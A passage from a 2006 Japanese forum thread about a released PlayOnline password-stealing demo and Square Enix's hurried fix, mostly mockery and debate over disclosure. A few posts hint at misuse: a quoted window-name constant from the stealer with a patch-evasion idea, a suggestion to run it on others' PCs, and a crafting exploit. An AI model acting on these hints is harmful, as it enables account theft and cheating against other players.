134既にその名前は使われています:2006/10/05(木) 02:07:59.98 ID:hPNPG5mp
素人は黙ってろや
135既にその名前は使われています:2006/10/05(木) 02:15:56.64 ID:GexXV2kg
>>132
nopって。それでできたら、全てのセキュリティは無意味ということになりませんか?
あと99%云々はあくまでもたとえでいっただけですので。
AES並の暗号強度とかいってみたほうがよかったですか?
136既にその名前は使われています:2006/10/05(木) 02:22:31.71 ID:QTw248BS
もちろん暗号化は必要だが、このツールに関して言えば、
認証終わったらメモリから消せやゴルァという話のような・・・
137既にその名前は使われています:2006/10/05(木) 02:26:20.41 ID:GexXV2kg
>>132
あと、サーバに暗号化されたものを送る場合、その暗号化されたもの
を盗めたとして、それを別のマシンから送信した場合に無駄にするよう
に作ればいいだけなのですよ。
あくまでも、以前関わった仕事にそんなのがあったというのを思いだし
ながら書いてるだけなので、暗号とかに関しては素人に近いです。ハイ

とりあえず、夜も遅いので今日のところはこれぐらいでZzzz
138既にその名前は使われています:2006/10/05(木) 03:02:39.89 ID:Fz2NR+Ug
お前らちょっとPOLみてこい
おもしれーことになってるから
139既にその名前は使われています:2006/10/05(木) 03:05:06.18 ID:Fz2NR+Ug
http://www.playonline.com/ff11/polnews/news8674.shtml

流石にお早いことでwwwwwwwwwwwww
140既にその名前は使われています:2006/10/05(木) 03:09:46.00 ID:pgTA2ggH
>本日、技術チームの調査により、不正なプログラムの使用によって、
>プレイオンラインIDおよびパスワードを盗用できる可能性が不具合として確認されました。

技術チームの調査は掲示板を見ることですか?
141既にその名前は使われています:2006/10/05(木) 03:10:45.71 ID:kQnE4Syw
対策が施されるまではPCでログインしない方が良さそうね。
142既にその名前は使われています:2006/10/05(木) 03:11:14.39 ID:AusjsNj0
おもすれー^^
143既にその名前は使われています:2006/10/05(木) 03:14:57.45 ID:Rfo1gBn9
夜中の3時にうぷとは流石にヤバイと踏んだか。
対応早くて頑張ってるんじゃね?




何年も気がつかなかったのはマヌケだが。
144既にその名前は使われています:2006/10/05(木) 03:17:04.38 ID:rrPwLmQd
作るスレの作者はGJってことか?
145既にその名前は使われています:2006/10/05(木) 03:17:44.50 ID:7hd7KAwo
ジョブチェン祭り以来の反応速度じゃね?w
146既にその名前は使われています:2006/10/05(木) 03:18:10.78 ID:3rVba9nX
対応早すぎだぞ
147既にその名前は使われています:2006/10/05(木) 03:18:30.36 ID:pgTA2ggH
さすがに気づいてるだろw
面倒なのと、あまり表沙汰にならなかったから放置してただけでw
148既にその名前は使われています:2006/10/05(木) 03:19:25.40 ID:pmlO/bB5
>本日、技術チームの調査により
>本日、技術チームの調査により
>本日、技術チームの調査により

すげー 堂々と嘘書いてるw
149既にその名前は使われています:2006/10/05(木) 03:20:17.89 ID:7u+sdTrH
良かったな、お前ら

技 術 チ ー ム 

に格上げらしいぞ
150既にその名前は使われています:2006/10/05(木) 03:20:57.55 ID:deSjbrVB
技術チーム=ネ実民
151既にその名前は使われています:2006/10/05(木) 03:22:08.50 ID:pmlO/bB5
なるほど それなら嘘じゃないw
152既にその名前は使われています:2006/10/05(木) 03:22:50.35 ID:/qPxlg5V
うそは書いていないな
(掲示板に投稿されていたネタを)調査して(事実として)確認したわけだし。
153既にその名前は使われています:2006/10/05(木) 03:23:16.90 ID:7u+sdTrH
昨日、ネ実民チームの調査により、不正なプログラムの使用によって、プレイオンラインIDおよびパスワードを盗用できる可能性が不具合として確認されました。

◆eとネ実民の連携プレイだな

154既にその名前は使われています:2006/10/05(木) 03:23:39.15 ID:deSjbrVB
絆か
155既にその名前は使われています:2006/10/05(木) 03:24:44.91 ID:kRNAm/YM
>>149
やったー^^

って テラワロス www
156既にその名前は使われています:2006/10/05(木) 03:25:04.32 ID:mDQ0XqXD
つかまだ対策してなかったのかこれ…
157既にその名前は使われています:2006/10/05(木) 03:25:43.97 ID:kQnE4Syw
>>153
FF11の板(壺)便利なツール・ソフトを作るスレ Ver.7の人たちは無視ですか。
158既にその名前は使われています:2006/10/05(木) 03:25:47.82 ID:Fz2NR+Ug
□e社内
17:10
なんだこれ?かなりやばげ?報告しとくか。
17:20
はーぁ?!ネ実の情報?ハイハイ開発に見せとくわー
20:00
流石にそろそろ帰るか。ん?あー忘れてた。開発にでも届けとくか。
20:15
あーはいはい、報告の類はそこに置いといてください。暗黒ファビョリすぎオモスレー
22:00
流石に飽きた。帰るか。っとその前に・・・・なんじゃこりゃぁぁぁ!!
23:00
こんな時間に呼び出すなヴォケ。で?なに
ネ実の情報?確認したの?
まだでしたw
さっさとやれ
24:00
w背drftgyふじこ;p:@「」

現在に至る
159既にその名前は使われています:2006/10/05(木) 03:25:51.30 ID:6VNrXWwy
昨日、技術チームの調査により

に修正されてるぞ
160既にその名前は使われています:2006/10/05(木) 03:26:48.17 ID:7u+sdTrH
1 :既にその名前は使われています :【2006/10/04(水) 17:10:12.64 ID:6uGDsr3/】
FF11の板(壺)の便利なツール・ソフトを作るスレ Ver.7で
PlayOnlineのパスワードぶっこ抜きデモがソース付で公開された。
http://yy10.kakiko.com/test/read.cgi/ff11/1156767706/269
    
  ↓   ↓   ↓   ↓
2006.10.05(木) 03:00 From: プレイオンライン
不正なプログラムにはご注意ください(10/5)

昨日、ネ実民チームの調査により、不正なプログラムの使用によって、プレイオンラインIDおよびパスワードを盗用できる可能性が不具合として確認されました。

絶対見てるよな?◆ewwwwwwwwwwww市ねwwwwwwwwwwwww

161既にその名前は使われています:2006/10/05(木) 03:27:49.00 ID:3rVba9nX
■e<見てなかったらこんなに早く対処できませんよ^^;;
162既にその名前は使われています:2006/10/05(木) 03:28:20.02 ID:7hd7KAwo
でもさー、「不正なプログラム」って表現ちょっとおかしくね?
規約違反ツールに限定されているみたいな印象を受けるぞ。俺だけかもしんないけど。
この場合「悪意のあるプログラム」のほうがしっくりくる希ガス。
163既にその名前は使われています:2006/10/05(木) 03:32:24.89 ID:7u+sdTrH
ふ‐ぐあい【不具合】
[名・形動]状態・調子がよくないこと。また、そのさま。「―な箇所を直す」
164既にその名前は使われています:2006/10/05(木) 03:32:49.60 ID:Eu40xu3a
>本日、技術チームの調査により  >本日、技術チームの調査により  >本日、技術チームの調査により
>本日、技術チームの調査により  >本日、技術チームの調査により  >本日、技術チームの調査により
>本日、技術チームの調査により  >本日、技術チームの調査により  >本日、技術チームの調査により
>本日、技術チームの調査により  >本日、技術チームの調査により  >本日、技術チームの調査により

165既にその名前は使われています:2006/10/05(木) 03:33:19.04 ID:u1UgfHEs
メモリにパスワードが存在することはアーガススレ等で何度も話題になっていたわけで
Windows版が発売された4年前からの仕様だろうし□eも放置を決め込んでいたようだが
実働コードが配布された途端に慌てて不具合不具合言い出してるのが非常に愉快
166既にその名前は使われています:2006/10/05(木) 03:33:59.59 ID:7u+sdTrH
かのう‐せい【可能性】
1 物事が実現できる見込み。「成功の―が高い」2 事実がそうである見込み。「生存している―もある」3 潜在的な発展性。「無限の―を秘める」4 認識論で、ある命題が論理的に矛盾を含んでいないという側面を...
167既にその名前は使われています:2006/10/05(木) 03:36:29.78 ID:ND6nePVq
怠慢がばれたら大慌てで取り繕ってやんの
どこまでユーザーなめてんだ、この会社
168既にその名前は使われています:2006/10/05(木) 03:40:17.61 ID:mG8KN0L2
田中「ねえねえ担当くん」
担当「なんですか。新アビのバランス調整でみんな忙しいんですけど」
田中「ネ実に面白いスレが立ってるよ」
担当「(あんたネットしてるんですか。)…どれですか」
田中「この『たまたま殺したロランのグーブーがダリア落とした』ってスレ。
   最初は駄スレだったんだけど、途中から良ネタや神絵師さんが光臨してすごいんだよ」
担当「どんだけハマってんですか!仕事しないならもう帰ってください!」
田中「うーん、面白いのになあ」
担当「…全く。ん?(その下の『PlayOnlineのパスワードぶっこ抜きデモが公開』スレに目を止める)
   …………た、た、大変だ!すぐに開発チームに連絡!主任クラスを集めろ!」
田中「役にたったようで嬉しい^^」
169既にその名前は使われています:2006/10/05(木) 03:40:34.56 ID:JPiJknKl
ネ実のほうがこういう情報は早いんだよなw
170既にその名前は使われています:2006/10/05(木) 03:41:18.23 ID:YFARjo4+
挙げ
171既にその名前は使われています:2006/10/05(木) 03:43:04.26 ID:YXx/Dglj
あれ?今日から昨日に変更されてるんだけどw
172既にその名前は使われています:2006/10/05(木) 03:45:38.92 ID:rrPwLmQd
独断と偏見による年表
http://ff11wiki.rdy.jp/-1223511864.html

追記してみた。 
技術チームのくだりとか、
今日、技術チームの → 昨日、技術チームの
に書き換わってる点については触れていないので補足したいかたはどうぞ
173既にその名前は使われています:2006/10/05(木) 03:51:39.81 ID:/qPxlg5V
>>171
ちょwwwwwマジかよwwwwwwwwwwwwwwww
それはやっちゃいけねえだろwwwwwwwwwwwwwwwwwwwwww
174既にその名前は使われています:2006/10/05(木) 03:53:08.28 ID:w++ojPYw
24パート4がやってなかったら社員は寝てて気づかなかっただろうな
175既にその名前は使われています:2006/10/05(木) 03:53:23.32 ID:Fz2NR+Ug
まぁ昨日の17時だからまちがっちゃいねぇわなw
これで一昨日にしたら笑えるがwwww
176既にその名前は使われています:2006/10/05(木) 03:58:54.60 ID:0jJl8lS4
>>77
当たりすぎだろwwwwwwwwwwwwww
177既にその名前は使われています:2006/10/05(木) 04:02:22.44 ID:fuPuQPfI
いままでチートに関連するスレでなんども話題にでて、
メールでも何度も修正要望だしたのに無視決め込んでたのに
ネ実に出したとたん、不具合が見つかりましたか。
ずいぶんと良い商売ですね。
不具合じゃなくてそう設計しただけだろ。
178既にその名前は使われています:2006/10/05(木) 04:03:44.80 ID:kQnE4Syw
ソースが出て誰でも簡単に抜けるようになったから驚いたんでしょうね。
179既にその名前は使われています:2006/10/05(木) 04:04:23.99 ID:Fz2NR+Ug
チートのコードとか出したらどんな対応してくれるのかwktk
180既にその名前は使われています:2006/10/05(木) 04:05:05.74 ID:0jJl8lS4
アーガスとかコード出てるのに対策してくんねーな。
181既にその名前は使われています:2006/10/05(木) 04:05:10.30 ID:w++ojPYw
いままでnyでユーザー情報流出とか顧客情報転売とか起こってないのは奇跡に近いな
182既にその名前は使われています:2006/10/05(木) 04:06:51.38 ID:rrPwLmQd
金曜の対策はウィンドタイトルかえるだけだろ?ww

>>11
const wchar_t *lpszWindowName = L"PlayOnline Viewer Ver.1.17.02h";
を変えるだけで通用しそうだww
183既にその名前は使われています:2006/10/05(木) 04:11:28.14 ID:jllAL0f1
クソワロタwww
対策早すぎwwwww
184既にその名前は使われています:2006/10/05(木) 04:14:41.75 ID:7hd7KAwo
流石に今までのチートツールで学習してるだろう。
いや、しかし・・・連中のことだから・・・。
ホントにそういう対策してきたら退会するわ。いい機会なので。
185既にその名前は使われています:2006/10/05(木) 04:15:35.43 ID:b2A5DAEB
>>26
類似するケースで判例あるのかな?
もしあったとしても、判断は個別具体的だからな
どーなんだろね
学術的とか、知的好奇心とか、、啓発とか
コメント入れててもダメな時はダメっぽいけどw
186既にその名前は使われています:2006/10/05(木) 04:17:50.87 ID:AELvNbu6
技術チームの調査 = ネ実
187既にその名前は使われています:2006/10/05(木) 04:18:12.20 ID:kQnE4Syw
>>182
アドレス位置もずらすでしょう。
応急処置なので暗号化は無し。
188既にその名前は使われています:2006/10/05(木) 04:20:41.10 ID:7hd7KAwo
簡単でもいいから暗号化と、メモリの動的な確保ぐらいはやっておきたい。
189既にその名前は使われています:2006/10/05(木) 04:24:00.18 ID:7gUorDKr
しらなかった
おれたちゃ□eの技術チーム及び調査部隊だったのか
190既にその名前は使われています:2006/10/05(木) 04:28:09.65 ID:qdrpL3LQ
ハゲワラ
スパジャン祭りのときもそうだったが
ほんとに朝から晩までネ実べったりなんだな
191既にその名前は使われています:2006/10/05(木) 04:37:55.27 ID:kQnE4Syw
「ゲームメーカーはこれまで、ソフトの開発時に膨大なコストをかけて
デバッグ(バグを発見し、取り除く作業)をやってきたが、
(プレイヤーにデバッグさせれば)このコストが軽減されるのではないか」(和田氏)
192既にその名前は使われています:2006/10/05(木) 04:39:57.53 ID:c8s3+3zy
毎日ネ実のリロードが仕事じゃあ糞スレも立てたくなるよな
193既にその名前は使われています:2006/10/05(木) 05:45:02.70 ID:X6+hRx+M
>>186
技術チームの調査 = ネ実の閲覧
194既にその名前は使われています:2006/10/05(木) 05:48:36.23 ID:fuPuQPfI
確かに一般的な業務とは違ってスペシャルタスクだな。
俺もネ実みて給料もらいたい。
195既にその名前は使われています:2006/10/05(木) 07:54:10.93 ID:6VNrXWwy
今日のパッチで動かなくなるツールは
罠確定ってことじゃね?w
196既にその名前は使われています:2006/10/05(木) 08:03:19.30 ID:fuPuQPfI
そうでもない。
197既にその名前は使われています:2006/10/05(木) 08:13:02.75 ID:aLwakBly
なんというか、間が抜けてるよなぁ。
デモと同じパス抜き(メモリから抜く)は中華が1年以上前に仕掛けた罠サイトで
実装していたし、おまけに当時の罠サイトはご丁寧にlogin_w.binも
ログイン画面のSSも併せて送信してたってのにな。
…オフセットとウィンドウ名変えるだけとかやめてくれよ?
198既にその名前は使われています:2006/10/05(木) 08:22:14.54 ID:aLwakBly
>>26
別に問題ないんじゃね? セキュリティの脆弱性の確認として実証コード
(IEから電卓やメモ帳を起動するような無害なもの)を公開することは多い。

いきなり公開はどうよ? て見方も確かにあるんだけど、
たとえば「Microsoftがさっぱり対応しないから実証コードを公開した」というのも
結構あるわけで、去年の罠サイト「花の雫FF11情報局」で
同様の手法で中華に日に50アカウントとか抜かれていたにも関わらず
暗号化などの抜本的な対策が一切なされていなかった事実があり
こうでもしなけりゃ対応されなかったと思うよ。

要望なんか出したってコピペ返信だし。
199既にその名前は使われています:2006/10/05(木) 08:32:07.52 ID:/KHTIglf
>>197
中華がやるのは内部の人間が関係してるから放置してたんじゃね?意味は分かるな?
内部の人間と関係ない人間がツールに仕込み始めそうだったから対策。
200既にその名前は使われています:2006/10/05(木) 08:42:40.39 ID:aLwakBly
>>199
それは脳みそ偏ってると思うぞ。
ROやLineageじゃあるまいし。
201既にその名前は使われています:2006/10/05(木) 08:46:07.58 ID:aLwakBly
WoWのパス抜きトロイ(もちろん中国製)も持ってるけど
これも簡単に抜けるくさいなぁ。
…ネトゲトロイのコレクションが膨大になってきた。
202既にその名前は使われています:2006/10/05(木) 08:52:08.63 ID:0J+O0uAr
上のプログラムを友達の家やネットカフェのFF用PCで実行すると面白い事になりそうだ。
203既にその名前は使われています:2006/10/05(木) 08:56:20.60 ID:7hd7KAwo
>>202
わかってると思うけどやったら御用だからな。
204既にその名前は使われています:2006/10/05(木) 08:59:01.51 ID:4/anx71N
なんでPC版出したんかねw
205既にその名前は使われています:2006/10/05(木) 09:01:25.76 ID:F4PP6gs9
今回対応早いな〜最近本当に運営チーム頑張ってるね
ちょっと見直しちゃった
206既にその名前は使われています:2006/10/05(木) 09:02:52.21 ID:UgZXIFsv
俺ら今度から技術チームって名乗るか
207既にその名前は使われています:2006/10/05(木) 09:02:54.65 ID:7hd7KAwo
もう何年もの間放置されてた問題であることをお忘れなく。
208既にその名前は使われています:2006/10/05(木) 09:17:12.28 ID:n+zLACq7
しかし退社前の17:10にスレ立てるなんて、>>1もとんだ■社員殺しだな
209既にその名前は使われています:2006/10/05(木) 09:18:22.09 ID:o5R3uKn+
つまり「技術チームの調査」にはネットで情報収集も含まれているんだな。
そしたらウソではなくなるわな・・・。

なんにせよSEに各クライアント一台ごとに別の公開鍵秘密鍵ペア用意するだけの必要性は
なかったってことかな。

そしてそれがパッチ一発で出来るとは思いにくいんだが、SEはどうやってパッチあてるつもりだろう・・・?
共通鍵で暗号化しても>>132が言うみたいにそっくりそのままコピペしたらいいみたいだし。

といってもPC内にハッカーの手下が住んでたらなにしても手遅れかな・・・。
210既にその名前は使われています:2006/10/05(木) 09:21:04.90 ID:xgr6A3uH
これは課金情報とかに関わるからなんだろうが・・・

早すぎワロタ
211既にその名前は使われています:2006/10/05(木) 09:21:13.96 ID:UBMxoE39
やっぱ、ネ実の力はすごいなw
212既にその名前は使われています:2006/10/05(木) 09:21:15.45 ID:EymQ4oU/
 
213既にその名前は使われています:2006/10/05(木) 09:45:04.04 ID:U5z0/q03
セキュリティオフィサー的立場なオレから言わせてもらうと、

> ※不正な外部プログラムや、ウィルス等への感染が無い場合には、
>  プレイオンラインIDおよびパスワードが盗用されることはあり
>  ません。

不正なプログラムやウィルスは、動いてるのが分からないように細工して仕込むものです。
そういうのから進入されてても、なおIDやパスワードを守れるようにするのがセキュリティ対策なんです。
さすがにキーロガー仕込まれたら終わりだが、安直にメモリに平文で内容を保持するなんて、まずありえない。
だから「不正な外部プログラムを〜」なんてアナウンスは、セキュリティ対策にすらならないんです。

セキュリティの考え方を改めてくださいね、■eさん。
214既にその名前は使われています:2006/10/05(木) 10:52:24.16 ID:12/SqSAC
セキュリティ対策会社にでも騙されたのか、暗号が万能だと思ってる人が多いな・・・
215既にその名前は使われています:2006/10/05(木) 10:56:37.91 ID:SN83lfHD
SSL位かな安全なのは・・・
216既にその名前は使われています:2006/10/05(木) 10:57:47.66 ID:u/n8uzLy
じゃあそのSSLとやらを導入したまへ
217既にその名前は使われています:2006/10/05(木) 10:58:06.39 ID:7hd7KAwo
だからって平文置きっぱなしはアホ過ぎると思わんか?
218既にその名前は使われています:2006/10/05(木) 11:02:25.98 ID:0chT3ZDV
FFやり初めて1年10ヶ月
ネ実を見て早1年半

気付けば技術チームに^^v
219既にその名前は使われています:2006/10/05(木) 11:05:31.24 ID:/uTgr1Lx
お前らがつまらない煽り入れるから■はここ見ない振りしてんだろうなw
ぷれみあwより遙かに建設的な意見も多いのにな。もったいないw
220既にその名前は使われています:2006/10/05(木) 11:10:24.01 ID:20j9WzQ4
ここでウンチク語られても困るんだけど?wwww
221既にその名前は使われています:2006/10/05(木) 11:14:40.76 ID:3bGjb7qs
無償技術チーム、ご苦労
222既にその名前は使われています:2006/10/05(木) 11:17:18.23 ID:+emUJjyz
二年ほど前に同内容がネ実で騒がれてた時は完全スルーしてたのにな。
なにが調査だ、バカか?
223既にその名前は使われています:2006/10/05(木) 11:26:45.45 ID:koFRVsnd
うーん、なんで、メモリオフセット指定するだけで読めるんだろ?
グローバル変数って、常に同じオフセットになるとかそんな感じ?

まぁセキュリティレベルとしては低い方だろうね
224既にその名前は使われています:2006/10/05(木) 11:27:41.05 ID:KCKUlcfw
スペシャルタスクチームはネ実を監視するチームってことか!
225既にその名前は使われています:2006/10/05(木) 11:27:51.00 ID:7pZbW0oA
ユーザーに馬鹿が多い事を■eが認識したから、
馬鹿のご機嫌取りでアホな対応もやって行こうって方針なんだろうな
顧客満足wって奴か
226既にその名前は使われています:2006/10/05(木) 11:33:38.06 ID:vZMURERt
ニートな俺もこれで給料貰えますか?w
227既にその名前は使われています:2006/10/05(木) 11:44:07.67 ID:LhJiJiMQ
>>205
>>210

>>77
77 名前:既にその名前は使われています[sage] 投稿日:2006/10/04(水) 18:48:37.80 ID:h2knBMfW
脆弱性を自らネ実で公開
→即時対応
→■<タスクチームの威力です

・・・マッチポンプ?
228既にその名前は使われています:2006/10/05(木) 11:45:28.20 ID:o4ZLPKIo
■e公式に謝罪してくんないかな、発売当初から放置してたくせにいまさら遅いんじゃないの?
ちなみにスレチガイだがVアプリのドラクエとかの致命的なバグもそろそろ認めたほうが良いんじゃないかな■eさん

てか、おまいらいいか!FF11のPC版ばっかじゃねえぞ、また■e逃げるから見てな
229既にその名前は使われています:2006/10/05(木) 12:08:30.31 ID:npSZonis
スレたてようとしたらたてれんかった。堂々とウソかくチーム晒し上げ



技術チームの調査は掲示板を見ること

名前: 既にその名前は使われています
E-mail:
内容:
PlayOnlineのパスワードぶっこ抜きデモが公開
http://live19.2ch.net/test/read.cgi/ogame/1159949412/l50


http://www.playonline.com/home/polnews/news8674.shtml
230既にその名前は使われています:2006/10/05(木) 12:33:55.51 ID:mztyIyGm
別スレでも書いたが、POLのIDがメモリにベタで入っているという事実は、
半年か1年前に情報として公開されていた。
ツールは出てなかったけどな。

で、■の対応はツールが出てから。なんだそりゃ?

「この車、場合によっては大爆発しますねー」
「そうか、いつ爆発するんだ?」
「状況によりますねー でも1年後は全国の8割が爆発しますよー」
「そうか、じゃあ爆発したら教えてくれ」

1年後
「全国の8割以上が爆発しました!」
「なんだって!そんな大問題が!!ああああ緊急会議だ!!いったいどういうことなんだ!!」


みたいなノリ
231既にその名前は使われています:2006/10/05(木) 12:41:40.92 ID:fcRpH3Ii
>>223
同じプログラムだったら動的に確保しても
同じアドレスに確保されたりすることはまれによくある
232既にその名前は使われています:2006/10/05(木) 12:49:44.71 ID:mztyIyGm
今回のパッチの内容を予想
 @"PlayOnline Viewer "が"PlayOnline-Viewer"に変化。これで緊急対応完了。
 AVer.1.17.02hがVer.1.17.03bに変化。これで対策完了。
 BIDとパスワード、それぞれ前後逆転して格納。これで対策完璧!
 CIDとパスワードをファイル管理にして、毎回ファイルから読み出し。
  この影響で、接続できなくなる不具合が発見され、連休中プレイできない人が大勢出現
 D格納アドレス変えました(^^
233既にその名前は使われています:2006/10/05(木) 12:51:43.50 ID:3bGjb7qs
娯楽産業は管理が甘くなるのが弱点だな

間違っても被害が少ない
234既にその名前は使われています:2006/10/05(木) 12:56:46.89 ID:LhJiJiMQ
>>229
技術チーム=チームネ実
http://live19.2ch.net/test/read.cgi/ogame/1160009178/
1 名前:既にその名前は使われています[] 投稿日:2006/10/05(木) 09:46:18.08 ID:SN83lfHD
235既にその名前は使われています:2006/10/05(木) 13:10:40.28 ID:30nc9UXC
パスぬいて昼間なら俺のキャラで遊ばせてやるよ。夜は俺やるからやるな
ちなみに今月課金してないからついでにやっといてくれ。
ウェブマネーだから買ってくんの忘れんなよ
236既にその名前は使われています:2006/10/05(木) 13:18:48.94 ID:mztyIyGm
スクウェアの言う技術=インターネットのページを読む技術
237既にその名前は使われています:2006/10/05(木) 14:23:47.56 ID:eINibz0u
糞樽:お前等必死だなwww
238既にその名前は使われています :2006/10/05(木) 14:29:48.76 ID:oWLPJ53j
まあ、アレだ。やられたやつプギャー!!
なんでも他人のせいにするんじゃねぇよwww
239既にその名前は使われています:2006/10/05(木) 14:40:39.33 ID:sNroHYMq
おまえら必死だなw
240既にその名前は使われています:2006/10/05(木) 14:46:20.18 ID:c8s3+3zy
これまでの人生の何割をこのキャラに使ってると思ってるんだwwwwwwwwww
241既にその名前は使われています:2006/10/05(木) 15:10:28.31 ID:MIIyLU0H
>231
まれによくある反語アゲ
242既にその名前は使われています:2006/10/05(木) 15:12:53.73 ID:QrBpGVGt
>>241
ブロントさんみたいなネ実語アルヨ。
243既にその名前は使われています:2006/10/05(木) 16:04:30.53 ID:n2hpVojN
>>241
ブロ語勉強しておいで
244既にその名前は使われています:2006/10/05(木) 16:17:45.10 ID:bHdpS1b4
ユーザーはデバッガー、この言葉に嘘は無いな。
245既にその名前は使われています:2006/10/05(木) 16:23:21.73 ID:ytCXrwmW
今このスレに開発がはりついてるのは確定的なので、ここで強化要望出そうぜw
246既にその名前は使われています:2006/10/05(木) 16:37:05.44 ID:LJCSSPoJ
もうここネトゲ実況板じゃおかしいな
ネトゲ技術開発板(スクエニチーム)に名前変えようぜ
247既にその名前は使われています:2006/10/05(木) 16:38:02.38 ID:mztyIyGm
ちょwwおまいらどうするんだwww


某社長の 「これからはユーザーにデバッグさせればいい」

が実現しちまったじゃまいか!!!!!







・・・・・はっ。   も・ももも・もしかしてスペシャルタスクチームというのは、ユーz.
248既にその名前は使われています:2006/10/05(木) 16:43:50.08 ID:/0v1n7Gy
スペシャルタスクチームって漏れらの事でしょ
249既にその名前は使われています:2006/10/05(木) 16:46:40.12 ID:iywkk7Er
>>229
吹いた
よもやいまさらネ実に焚きつけられて動くなんてことはないと思ってたが・・・
判明時点で対策しないなら今回のも見なかったことでいいんじゃないのか
250既にその名前は使われています:2006/10/05(木) 16:51:07.70 ID:w1i/Nusl
>>249
チゴーとかNAは一月以上やってたのにネ実にスレたって6時間で緊急メンテ
251既にその名前は使われています:2006/10/05(木) 16:53:51.95 ID:LJCSSPoJ
チゴーバグ発覚のときも明らかに見てたからねぇ
正直メールなんざ送るより非公式であるネ実にスレ立てたほうがよっぽど意見は反映される
こんなの異常だ 異常過ぎる
ずっと前から分かりきってたことではあるけど改めて再確認出来た
252既にその名前は使われています:2006/10/05(木) 16:54:17.42 ID:LJCSSPoJ
おっと、かぶってたか
これは失敬
253既にその名前は使われています:2006/10/05(木) 17:16:11.64 ID:HTDFeLz9
もうこうなったらFFのシステム公開してユーザーにデバック・修正・追加・更新させたらいいんじゃね?
254既にその名前は使われています:2006/10/05(木) 17:26:02.39 ID:0WaHvO9h
>>1は良識のある開発担当の内部告発
255既にその名前は使われています:2006/10/05(木) 18:22:50.55 ID:F4PP6gs9
>>230
喩えがおかしいな
POLIDがメモリにベタで入ってるって「情報」がでたのが1年前であっても
その時点では何の証拠もなかったからノーカンだろ?
今回ツールが公開されて初めて事実として確認された
つまり昨日のツール公開時点まで、POLIDがメモリにベタで入ってるって
いう「事実」は無かったんだよ
わかるかな?
事実が出た以上対策を講じるのは当然なんだけど、今回非常に対応が
早くてて、運営のやる気が感じられた
深夜まで対策に追われて大変だったと思う
セキュリティへの意識も高く我々ユーザーは安心してゲームできるんだから
労いの言葉くらいかけてあげようよ
256既にその名前は使われています:2006/10/05(木) 18:23:38.06 ID:pb55SXza
証拠も無いって…
メモリサーチ掛けたら一発で判るだろうがw
257既にその名前は使われています:2006/10/05(木) 18:25:03.20 ID:SN83lfHD
橋をかけるのを忘れていて、みんな泳いでわたっていた。
ある人物が、橋がないのはなぜ?って大声で言った。
翌日、そこには橋ができあがった。
翌日、みんなは泳いでわたっていた。
258既にその名前は使われています:2006/10/05(木) 18:28:19.66 ID:O3t8ypln
バグつながりで

合成でたとえば鍛冶と彫金を同時に+3とかスキルを上げる方法あるけど
こういうのは広めないで自分だけウマーした方がいいの?
これを使うと絶対+11や+31を確保できない合成(ホーバージョン等)で
有利になるけど。
259既にその名前は使われています:2006/10/05(木) 18:28:48.92 ID:fuPuQPfI
そんなあからさまな釣りでも反応したくなってしまうのはまだまだ未熟ってことかな・・・
260既にその名前は使われています:2006/10/05(木) 18:30:17.62 ID:fuPuQPfI
>>258
鍛冶エプロンとかきて、彫金サポすればいいんじゃねーの?
261既にその名前は使われています:2006/10/05(木) 18:32:42.45 ID:O3t8ypln
装備とは別枠で鍛冶+3彫金+3とかできる。
つまり
例えだけど鍛冶109 彫金63の状態で合成できるってこと。
262既にその名前は使われています:2006/10/05(木) 18:33:18.53 ID:O3t8ypln
たぶん、+3できるのは2種までだと思う
263既にその名前は使われています:2006/10/05(木) 18:33:27.38 ID:fuPuQPfI
ゴクリ・・・
264既にその名前は使われています:2006/10/05(木) 18:34:05.49 ID:iywkk7Er
証拠もないって・・・
開発側は作った時点で把握してるわけだが
265既にその名前は使われています:2006/10/05(木) 18:35:14.81 ID:B5lLwi3q
合成時にオフセット0x421144FFのメモリいじるといい事あるお!
266既にその名前は使われています:2006/10/05(木) 18:35:21.70 ID:O3t8ypln
109ってなんだ、106ね
ホーバーならメイン100 裁縫70にすればいいから
鍛冶94+3+3 裁縫66+メガネ+3でHQ率が約25%にできる。
少し考えればやり方わかると思うよ。
267既にその名前は使われています:2006/10/05(木) 18:37:58.70 ID:DFT2a3T1
ID:F4PP6gs9
どうみても社員です。
>>205
>>255
205 名前:既にその名前は使われています[sage] 投稿日:2006/10/05(木) 09:01:25.76 ID:F4PP6gs9
今回対応早いな〜最近本当に運営チーム頑張ってるね
ちょっと見直しちゃった
268既にその名前は使われています:2006/10/05(木) 18:40:46.01 ID:iywkk7Er
自演擁護するにももう少し賢い文面を考えてくれ
269230:2006/10/05(木) 18:47:16.60 ID:mztyIyGm
>>255
釣りかもしれんが、俺の喩えでも「車が爆発したという事実」は無いんだが・・・
つまり、1年後に実際に爆発するまで、車が爆発するって
いう「事実」は無かったんだよ
わかるかな?
270既にその名前は使われています:2006/10/05(木) 18:50:21.94 ID:mztyIyGm
>>255
>深夜まで対策に追われて大変だったと思う

馬鹿か?甘い設計に甘いセキュリティ概念に甘い管理体制が祟ってこうなったんだろ。
そういった甘さが総じて毎回大慌てで、でもその場対策しか行わない、
目の前で起きたことしか対策しない(影響範囲?なにそれ??って状態だ)から、
全ては本人達の責任じゃないか。深夜?大変?馬鹿か、おまえは。

学生か?
271既にその名前は使われています:2006/10/05(木) 18:54:28.29 ID:LJCSSPoJ
こういうところから開発はJPへの見方を悪くし、逆に何故かNAの見方はよくなるのか?
>>255
取りあえず早急に対策を講じたのは、範疇としては企業として当然のことだけど、
その当然のことが出来ない企業が増えている昨今、それらと見比べればよくやったといえなくもないかもしれない・・・
だがそれ以上に過失が大きすぎる
あとはっきり言うが、前半部分はほぼ屁理屈に近いものがある
もし本当に>>255が社員だとしたら、解約せざるを得んな・・・
流石にそれはないだろうけど
272既にその名前は使われています:2006/10/05(木) 19:11:23.71 ID:QTw248BS
現場の人間にはご苦労さん
多分初期から残ってたミスだろうから、ソース書いた香具師は
ひょっとしたらもう現場にはいないかもしれんし

ただ、ミスの程度がヘボいのに加えて、発覚したのがこのスレか壺だったり、
今まで指摘した者はいなかったのかとか、そもそも知ってたんじゃないの?とか
色々な要因から、企業としては「なにやってんだよ」というレベル
273既にその名前は使われています:2006/10/05(木) 19:22:41.55 ID:YKdhzNkm
パスに11111111...でXORしただけとかありそうだ。
274既にその名前は使われています:2006/10/05(木) 19:29:24.30 ID:SN83lfHD
ふつうに4桁の番号で、0721
275既にその名前は使われています:2006/10/05(木) 19:51:21.67 ID:F4PP6gs9
>>269
喩えがおかしいって意味がうまく伝わらなかったようで残念
車の不具合に喩るなら今回のことは
車(FF)には特に問題がなかったのに、車の持ち主(プレイヤー)が違法改造パーツを
勝手に無断で装着(ツール使用)して走り回って事故(IDPASS漏洩)起こす危険が
